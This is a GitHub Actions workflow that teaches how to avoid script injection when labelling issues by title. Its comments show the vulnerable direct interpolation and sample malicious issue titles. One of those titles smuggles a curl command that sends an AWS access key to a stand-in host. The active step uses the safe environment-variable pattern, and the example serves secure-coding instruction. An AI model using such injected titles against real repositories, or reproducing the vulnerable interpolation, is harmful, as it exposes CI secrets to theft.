name: Label Issues (Script Injection Example)
on:
  issues:
    types:
      - opened
jobs:
  assign-label:
    runs-on: ubuntu-latest
    steps:
      - name: Assign label
        # issue title could be
        # a"; echo Got your secrets"
        # a"; curl http://mybadsite/?abc=$AWS_ACCESS
        # run: |
        #   issue_title="${{ github.event.issue.title }}"
        #   if [[ "$issue_title" == *"bug"* ]]; then
        #   echo "Issue is about a bug!"
        #   else
        #   echo "Issue is not about a bug"
        #   fi
        env:
          TITLE: ${{ github.event.issue.title }}
          # convert to string to avoid script injection
        run: |
          if [[ "$TITLE" == *"bug"* ]]; then
          echo "Issue is about a bug!"
          else
          echo "Issue is not about a bug"
          fi
